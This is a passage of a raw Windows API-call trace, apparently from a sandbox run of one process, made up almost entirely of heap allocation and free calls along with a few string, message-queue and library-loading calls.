0 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0266.363] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0266.363] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0266.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.364] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.364] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.364] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0266.365] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.365] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.368] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.368] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 